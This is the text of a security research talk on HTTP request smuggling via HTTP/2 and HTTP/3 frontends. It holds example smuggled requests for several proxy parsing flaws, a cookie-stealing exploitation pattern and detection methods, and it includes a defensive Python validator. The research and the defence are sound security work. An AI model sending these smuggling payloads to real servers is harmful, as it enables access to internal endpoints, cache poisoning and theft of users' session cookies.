Emil Lerner
HTTP Request Smuggling via higher HTTP versions

Emil Lerner
independent security researcher
CTO at WunderFund.io
Bushwhackers CTF team
@emil_lerner
@neex
HTTP
Client --HTTP Request--> Server
Client <--HTTP Response-- Server

Reverse proxy
Client --HTTP Request--> Frontend Server --HTTP Request--> Backend Server
Client <--HTTP Response-- Frontend Server <--HTTP Response-- Backend Server

HTTP keep-alive
Client --HTTP Request 1--> Server
Client <--HTTP Response 1-- Server
Client --HTTP Request 2--> Server
Client <--HTTP Response 2-- Server
HTTP/1.1 body transfer
Content-Length header:
    Content-Length: 100

    Here goes 100 bytes
    of the request body.

Chunked encoding:
    Transfer-Encoding: chunked

    ff
    Here goes 255-byte chunk
    10
    Another chunk
    0
HTTP keep-alive (to backend)
Client1 --HTTP Request 1--> Frontend Server                      (Client1 connection)
Client2 --HTTP Request 2--> Frontend Server                      (Client2 connection)
Frontend Server --HTTP Request 1, HTTP Request 2--> Backend Server   (single backend connection)
Frontend Server <--HTTP Response 1, HTTP Response 2-- Backend Server
Client1 <--HTTP Response 1-- Frontend Server
Client2 <--HTTP Response 2-- Frontend Server
HTTP Request Smuggling
Old & known attack
Gained a lot of attention after James Kettle's talk at BH USA 2019
He discovered a lot of new techniques

HTTP Request Smuggling
An attacker sends a malicious request
It is parsed as a single request by the frontend and is forwarded to the backend
The backend parses it as two separate requests
HTTP Request Smuggling
    POST / HTTP/1.1
    Content-Length: 100
    Transfer-Encoding : chunked

    0

    GET /internal HTTP/1.1
    ...

Frontend interprets Content-Length: it thinks everything after the headers is body
Backend interprets Transfer-Encoding: it thinks GET /internal is another request
HTTP Request Smuggling
It's all about Content-Length / Transfer-Encoding
Transfer-Encoding has precedence
We need to "smuggle" Transfer-Encoding to the backend unprocessed by the frontend
HTTP Request Smuggling
    POST / HTTP/1.1
    Content-Length: 100
    Transfer-Encoding: identity,
     chunked

    0

    GET /internal HTTP/1.1
    ...

Frontend interprets Content-Length: it thinks everything after the headers is body
Backend interprets the Transfer-Encoding value continued on the next line: it thinks GET /internal is another request
Exploitation
Accessing internal endpoints
Cache poisoning
Stealing other users’ requests
Exploitation: stealing requests
Attacker→Frontend:
    GET / HTTP/1.1
    Transfer-Encoding : chunked
    ...

    POST /save HTTP/1.1

Victim→Frontend:
    GET / HTTP/1.1
    Cookie: secret

Frontend→Backend:
    GET / HTTP/1.1
    Transfer-Encoding : chunked
    ...

    POST /save HTTP/1.1

    data=GET / HTTP/1.1
    Cookie: secret

Exploitation: stealing requests
The victim's request is appended to ours
Most frameworks are OK with newlines in forms
The victim's cookies are saved to our profile, PMs or other places where we can view them later
HTTP/2 overview
Widely adopted by now
Binary protocol (no special chars)
Almost always terminated at the frontend

HTTP/2 termination
Client --PRI * HTTP/2.0, <binary>, :method GET--> Frontend --GET / HTTP/1.1--> Backend
Client <--:status 200-- Frontend <--HTTP/1.1 200 OK-- Backend

HTTP/2 body transfer
Request body is transferred in binary frames
Content-Length not required, but allowed
Transfer-Encoding: chunked has no effect
Potential bug #1: content-length conflicts with actual length
Client→Frontend:
    :method POST
    :authority host.com
    content-length: 1

    XGET /internal HTTP/1.1      (body)
    ...
Frontend→Backend:
    POST / HTTP/1.1
    Host: host.com
    Content-Length: 1

    XGET /internal HTTP/1.1
    ...

Potential bug #2: no content-length forwarding
Client→Frontend:
    :method GET
    :authority host.com

    GET /internal HTTP/1.1       (body)
Frontend→Backend:
    GET / HTTP/1.1
    Host: host.com

    GET /internal HTTP/1.1

Potential bug #3: content-length conflicting with transfer-encoding
Client→Frontend:
    :method POST
    :authority host.com
    content-length: 100
    transfer-encoding: chunked

    0                            (body)

    GET /internal HTTP/1.1
    ...
Frontend→Backend:
    POST / HTTP/1.1
    Host: host.com
    Content-Length: 100
    Transfer-Encoding: chunked

    0

    GET /internal HTTP/1.1
    ...
HTTP/2 header validation
Header names and values are binary strings
Names and values can contain newlines
Names can contain colons
Potential bug #4: newlines in headers
Client→Frontend:
    :method GET
    :authority host.com
    x: ⏎⏎GET /internal HTTP/1.1 ...
Frontend→Backend:
    GET / HTTP/1.1
    Host: host.com
    X:

    GET /internal HTTP/1.1
    ...

Potential bug(s) #5: less strict validation
Client→Frontend:
    :method POST
    :authority host.com
    content-length: 100
    transfer-encoding : chunked

    0                            (body)

    GET /internal HTTP/1.1
    ...
Frontend→Backend:
    POST / HTTP/1.1
    Host: host.com
    Content-Length: 100
    transfer-encoding : chunked

    0

    GET /internal HTTP/1.1
    ...

Potential bug(s) #5: less strict validation
Client→Frontend:
    :method POST
    :authority host.com
    content-length: 100
    transfer_encoding: chunked

    0                            (body)

    GET /internal HTTP/1.1
    ...
Frontend→Backend:
    POST / HTTP/1.1
    Host: host.com
    Content-Length: 100
    Transfer_Encoding: chunked

    0

    GET /internal HTTP/1.1
    ...

Potential bug(s) #5: less strict validation
Client→Frontend:
    :method POST
    :authority host.com
    content-length: 100
    transfer-encoding: chunKed

    0                            (body)

    GET /internal HTTP/1.1
    ...
Frontend→Backend:
    POST / HTTP/1.1
    Host: host.com
    Content-Length: 100
    Transfer-Encoding: chunKed

    0

    GET /internal HTTP/1.1
    ...
What does the RFC say?
RFC 7540 mentions Intermediary Encapsulation Attacks in section 10.3
Basically says "implementation must reject things it can't handle" :)
Explicitly mentions newlines and \x00 (NUL)
Detection idea #1: make backend expect more data
Craft a request such that:
    the backend expects more data
    the frontend thinks it sent the whole request
The request will hang
Implemented in James Kettle's Burp plugin (for HTTP/1.1)

Detection idea #1: make backend expect more data
    :method POST
    content-length: 5
    h:⏎transfer-encoding:chunked

    fff

Frontend interprets content-length: 5 and thinks the body is finished
Backend interprets transfer-encoding: chunked, expects more data and hangs
Detection idea #2: chunked body parsing
Chunked encoding should never be parsed in HTTP/2
If the response depends on the validity of the chunked encoding, it is a possible vulnerability
There are some false positives

Detection idea #2: chunked body parsing
Client --:method POST, transfer-encoding : chunked, invalid chunked body--> Frontend --POST / HTTP/1.1, transfer-encoding : chunked, invalid chunked body--> Backend
Client <--:status 400-- Frontend <--HTTP/1.1 400-- Backend
Detection idea #3: content-length parsing
Send something like x:x⏎content-length:1000
If the response depends on the value, it's a possible vulnerability
Even more false positives :(

False positive scenario
Client --HTTP/2--> Frontend (HTTP/2 termination, HTTP/1 processing) --HTTP/1.1--> Backend
Varnish flaw
Client→Varnish:
    :method GET
    :authority host.com
    content-length: 0

    GET /internal HTTP/1.1       (body)
    ...
Varnish→Backend:
    GET / HTTP/1.1
    Host: host.com
    content-length: 0

    GET /internal HTTP/1.1
    ...
Potential bug #6: RFC 8441
Designed for WebSockets over HTTP/2
A client sends the CONNECT method and sets the :protocol special header
The intermediary translates it to Upgrade

Haproxy & nghttp2 flaws
Client→Frontend:
    :method CONNECT
    :authority host.com
    :protocol websocket

    GET /internal HTTP/1.1       (body)
    ...
Frontend→Backend:
    GET / HTTP/1.1
    Host: host.com
    Connection: upgrade
    Upgrade: websocket

    GET /internal HTTP/1.1
    ...
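As an added illustration (not code from the talk, from http2smugl, or from any of the proxies named above), here is a hypothetical validation layer a frontend could run before downgrading an HTTP/2 request to HTTP/1.1. It rejects the request shapes behind potential bugs #1 to #6 (length mismatch, missing framing, forwarded transfer-encoding, CR/LF/NUL in fields, loosely validated names, a body on an extended CONNECT) and regenerates Content-Length from the bytes actually received. All names are invented; requiring :method, :path and :authority on every request is a simplification.

```python
# Added example: a hypothetical HTTP/2 -> HTTP/1.1 downgrade guard. It is not code
# from the talk or from any real proxy; the names below are invented for illustration.
# A request is modelled as a list of (name, value) byte pairs in HPACK order plus the
# concatenated DATA-frame payload, which is what an intermediary holds before it
# serialises an HTTP/1.1 request for the backend.
import re

# Request pseudo-headers (RFC 7540 section 8.1.2.3; :protocol from RFC 8441).
ALLOWED_PSEUDO = {b":method", b":scheme", b":authority", b":path", b":protocol"}

# Connection-specific fields must not appear in HTTP/2 requests and must never be copied
# into the downgraded request; a forwarded transfer-encoding is the core of bugs #3 and #5.
CONNECTION_SPECIFIC = {b"connection", b"transfer-encoding", b"keep-alive",
                       b"proxy-connection", b"upgrade"}

# Conservative header-name charset: lowercase letters, digits and hyphen only. It refuses
# spaces ("transfer-encoding :"), colons inside names and underscores ("transfer_encoding").
NAME_RE = re.compile(rb"^[a-z0-9-]+$")
# An HTTP/1.1 method is a token; a space inside :method would become part of the
# request line ("GET /internal HTTP/1.1" smuggled through the method).
TOKEN_RE = re.compile(rb"^[!#$%&'*+.^_`|~0-9A-Za-z-]+$")
# :path and :authority must be visible ASCII with no whitespace or control bytes.
VISIBLE_RE = re.compile(rb"^[\x21-\x7e]+$")
# Bytes that can never be serialised safely into an HTTP/1.1 field line: NUL, CR, LF.
FORBIDDEN_BYTES = frozenset({0x00, 0x0D, 0x0A})


class DowngradeError(ValueError):
    """Raised when the request must be rejected instead of forwarded."""


def validate_fields(headers, body):
    """Check every header field against the body; return (pseudo, regular) or raise."""
    pseudo, regular, seen_regular = {}, [], False
    for name, value in headers:
        if any(b in FORBIDDEN_BYTES for b in name + value):
            raise DowngradeError("NUL/CR/LF in header field %r" % name)    # bug #4
        if name.startswith(b":"):
            # Pseudo-headers: known names only, no duplicates, all before regular fields.
            if seen_regular or name not in ALLOWED_PSEUDO or name in pseudo:
                raise DowngradeError("bad pseudo-header %r" % name)
            pseudo[name] = value
            continue
        seen_regular = True
        if not NAME_RE.match(name):
            raise DowngradeError("invalid header name %r" % name)         # bug #5
        if value != value.strip(b" \t"):
            raise DowngradeError("surrounding whitespace in value of %r" % name)
        if name in CONNECTION_SPECIFIC:
            raise DowngradeError("connection-specific header %r" % name)  # bugs #3, #5
        if name == b"content-length" and (not value.isdigit() or int(value) != len(body)):
            # bug #1 and the Varnish flaw: declared length must equal bytes received.
            raise DowngradeError("content-length %r != actual body length %d"
                                 % (value, len(body)))
        regular.append((name, value))
    return pseudo, regular


def downgrade(headers, body=b""):
    """Return the HTTP/1.1 request bytes that may be forwarded, or raise DowngradeError."""
    pseudo, regular = validate_fields(headers, body)
    for required in (b":method", b":path", b":authority"):  # simplification: always required
        if required not in pseudo:
            raise DowngradeError("missing %r" % required)
    method, path, authority = pseudo[b":method"], pseudo[b":path"], pseudo[b":authority"]
    if not TOKEN_RE.match(method):
        raise DowngradeError("method is not a token: %r" % method)
    if not (VISIBLE_RE.match(path) and VISIBLE_RE.match(authority)):
        raise DowngradeError("whitespace or control bytes in :path/:authority")
    lines = [b"%s %s HTTP/1.1" % (method, path), b"Host: " + authority]
    if b":protocol" in pseudo:
        # bug #6: RFC 8441 extended CONNECT is translated to an Upgrade request. A body
        # that arrived with it must not be forwarded ahead of the backend's 101 response,
        # where the backend would read it as the next request.
        if method != b"CONNECT":
            raise DowngradeError(":protocol is only valid with CONNECT")
        if body:
            raise DowngradeError("body on extended CONNECT before upgrade completed")
        lines[0] = b"GET %s HTTP/1.1" % path
        lines += [b"Connection: upgrade", b"Upgrade: " + pseudo[b":protocol"]]
    for name, value in regular:
        if name != b"content-length":
            lines.append(name + b": " + value)
    # bug #2: framing is regenerated from the bytes actually received, never copied from
    # the client, so frontend and backend cannot disagree about where the body ends.
    lines.append(b"Content-Length: %d" % len(body))
    return b"\r\n".join(lines) + b"\r\n\r\n" + body


def reject_reason(headers, body=b""):
    """None if the request may be forwarded, otherwise the reason it was rejected."""
    try:
        downgrade(headers, body)
    except DowngradeError as exc:
        return str(exc)
    return None
```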
Open problem: one-way size discrepancy
Attacks work if the backend reads less data than the frontend
Detection methods work if the backend expects more data
What if the first is achievable, but the second is not possible?

H2O http3 (QUIC) flaw
Client→Frontend:
    :method POST
    content-length: 100
    x:x⏎transfer-encoding:chunked

    0                            (body)

    GET /internal HTTP/1.1
    ...
Frontend→Backend:
    POST / HTTP/1.1
    Content-length: 100
    X: x
    Transfer-Encoding: chunked

    0

    GET /internal HTTP/1.1
    ...
Automation
I've implemented the http2smugl tool
It performs automatic vulnerability detection using the discussed methods
It also supports sending "invalid" queries via a custom HTTP/2 implementation

Further research needed
HTTP/1 special headers, writing to closed streams, HPACK and >40 implementations not researched
Stable detection methods wanted
Putting space + path into :method can lead to hitting internal endpoints and Host override

Thank you!
https://github.com/neex/http2smugl

Weitere ähnliche Inhalte

Was ist angesagt?

OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesFrans Rosén
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
 
Cross Origin Resource Sharing
Cross Origin Resource SharingCross Origin Resource Sharing
Cross Origin Resource SharingLuke Weerasooriya
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & InconsistencyGreenD0g
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundDirkjanMollema
 
OWASP API Security Top 10 - API World
OWASP API Security Top 10 - API WorldOWASP API Security Top 10 - API World
OWASP API Security Top 10 - API World42Crunch
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectBlueinfy Solutions
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Barrel Software
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigFrans Rosén
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionSoroush Dalili
 
Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Sagar M Parmar
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)TzahiArabov
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked LookJason Lang
 
Same Origin Method Execution (BlackHat EU2014)
Same Origin Method Execution (BlackHat EU2014)Same Origin Method Execution (BlackHat EU2014)
Same Origin Method Execution (BlackHat EU2014)Ben Hayak
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesSoftware Guru
 

Was ist angesagt? (20)

Http request smuggling
Http request smugglingHttp request smuggling
Http request smuggling
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
 
Cross Origin Resource Sharing
Cross Origin Resource SharingCross Origin Resource Sharing
Cross Origin Resource Sharing
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & Inconsistency
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHound
 
OWASP API Security Top 10 - API World
OWASP API Security Top 10 - API WorldOWASP API Security Top 10 - API World
OWASP API Security Top 10 - API World
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
 
Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked Look
 
Same Origin Method Execution (BlackHat EU2014)
Same Origin Method Execution (BlackHat EU2014)Same Origin Method Execution (BlackHat EU2014)
Same Origin Method Execution (BlackHat EU2014)
 
HTTP Security Headers
HTTP Security HeadersHTTP Security Headers
HTTP Security Headers
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
 

Ähnlich wie HTTP Request Smuggling via higher HTTP versions

HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0Cory Forsyth
 
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...Ontico
 
Interactive web. O rly?
Interactive web. O rly?Interactive web. O rly?
Interactive web. O rly?timbc
 
Hidden Gems in HTTP
Hidden Gems in HTTPHidden Gems in HTTP
Hidden Gems in HTTPBen Ramsey
 
DEF CON 27- ALBINOWAX - http desync attacks
DEF CON 27- ALBINOWAX - http desync attacksDEF CON 27- ALBINOWAX - http desync attacks
DEF CON 27- ALBINOWAX - http desync attacksFelipe Prado
 
Making the Most of HTTP In Your Apps
Making the Most of HTTP In Your AppsMaking the Most of HTTP In Your Apps
Making the Most of HTTP In Your AppsBen Ramsey
 
Http request&response by Vignesh 15 MAR 2014
Http request&response by Vignesh 15 MAR 2014Http request&response by Vignesh 15 MAR 2014
Http request&response by Vignesh 15 MAR 2014Navaneethan Naveen
 
Introduction to HTTP/2
Introduction to HTTP/2Introduction to HTTP/2
Introduction to HTTP/2Ido Flatow
 
Covert Timing Channels using HTTP Cache Headers
Covert Timing Channels using HTTP Cache HeadersCovert Timing Channels using HTTP Cache Headers
Covert Timing Channels using HTTP Cache HeadersDenis Kolegov
 
Hypertex transfer protocol
Hypertex transfer protocolHypertex transfer protocol
Hypertex transfer protocolwanangwa234
 

Ähnlich wie HTTP Request Smuggling via higher HTTP versions (20)

HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
 
Http2 kotlin
Http2   kotlinHttp2   kotlin
Http2 kotlin
 
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...
 
Http-protocol
Http-protocolHttp-protocol
Http-protocol
 
Interactive web. O rly?
Interactive web. O rly?Interactive web. O rly?
Interactive web. O rly?
 
Hidden Gems in HTTP
Hidden Gems in HTTPHidden Gems in HTTP
Hidden Gems in HTTP
 
HTTP
HTTPHTTP
HTTP
 
DEF CON 27- ALBINOWAX - http desync attacks
DEF CON 27- ALBINOWAX - http desync attacksDEF CON 27- ALBINOWAX - http desync attacks
DEF CON 27- ALBINOWAX - http desync attacks
 
Appl layer
Appl layerAppl layer
Appl layer
 
HTTP
HTTPHTTP
HTTP
 
Http
HttpHttp
Http
 
HTTP
HTTPHTTP
HTTP
 
Http request&response
Http request&responseHttp request&response
Http request&response
 
Making the Most of HTTP In Your Apps
Making the Most of HTTP In Your AppsMaking the Most of HTTP In Your Apps
Making the Most of HTTP In Your Apps
 
Starting With Php
Starting With PhpStarting With Php
Starting With Php
 
applayerslides.ppt
applayerslides.pptapplayerslides.ppt
applayerslides.ppt
 
Http request&response by Vignesh 15 MAR 2014
Http request&response by Vignesh 15 MAR 2014Http request&response by Vignesh 15 MAR 2014
Http request&response by Vignesh 15 MAR 2014
 
Introduction to HTTP/2
Introduction to HTTP/2Introduction to HTTP/2
Introduction to HTTP/2
 
Covert Timing Channels using HTTP Cache Headers
Covert Timing Channels using HTTP Cache HeadersCovert Timing Channels using HTTP Cache Headers
Covert Timing Channels using HTTP Cache Headers
 
Hypertex transfer protocol
Hypertex transfer protocolHypertex transfer protocol
Hypertex transfer protocol
 

Kürzlich hochgeladen

Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Velvetech LLC
 
Folding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a seriesFolding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a seriesPhilip Schwarz
 
Buds n Tech IT Solutions: Top-Notch Web Services in Noida
Buds n Tech IT Solutions: Top-Notch Web Services in NoidaBuds n Tech IT Solutions: Top-Notch Web Services in Noida
Buds n Tech IT Solutions: Top-Notch Web Services in Noidabntitsolutionsrishis
 
Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...
Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...
Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...Matt Ray
 
How to Track Employee Performance A Comprehensive Guide.pdf
How to Track Employee Performance A Comprehensive Guide.pdfHow to Track Employee Performance A Comprehensive Guide.pdf
How to Track Employee Performance A Comprehensive Guide.pdfLivetecs LLC
 
Best Web Development Agency- Idiosys USA.pdf
Best Web Development Agency- Idiosys USA.pdfBest Web Development Agency- Idiosys USA.pdf
Best Web Development Agency- Idiosys USA.pdfIdiosysTechnologies1
 
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)jennyeacort
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWave PLM
 
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...Angel Borroy López
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxTier1 app
 
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...OnePlan Solutions
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...stazi3110
 
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...confluent
 
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdfGOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdfAlina Yurenko
 
What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...Technogeeks
 
Xen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdfXen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdfStefano Stabellini
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024StefanoLambiase
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEOrtus Solutions, Corp
 
Introduction Computer Science - Software Design.pdf
Introduction Computer Science - Software Design.pdfIntroduction Computer Science - Software Design.pdf
Introduction Computer Science - Software Design.pdfFerryKemperman
 

Kürzlich hochgeladen (20)

Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort ServiceHot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
 
Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...
 
Folding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a seriesFolding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a series
 
Buds n Tech IT Solutions: Top-Notch Web Services in Noida
Buds n Tech IT Solutions: Top-Notch Web Services in NoidaBuds n Tech IT Solutions: Top-Notch Web Services in Noida
Buds n Tech IT Solutions: Top-Notch Web Services in Noida
 
Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...
Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...
Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...
 
How to Track Employee Performance A Comprehensive Guide.pdf
How to Track Employee Performance A Comprehensive Guide.pdfHow to Track Employee Performance A Comprehensive Guide.pdf
How to Track Employee Performance A Comprehensive Guide.pdf
 
Best Web Development Agency- Idiosys USA.pdf
Best Web Development Agency- Idiosys USA.pdfBest Web Development Agency- Idiosys USA.pdf
Best Web Development Agency- Idiosys USA.pdf
 
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need It
 
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
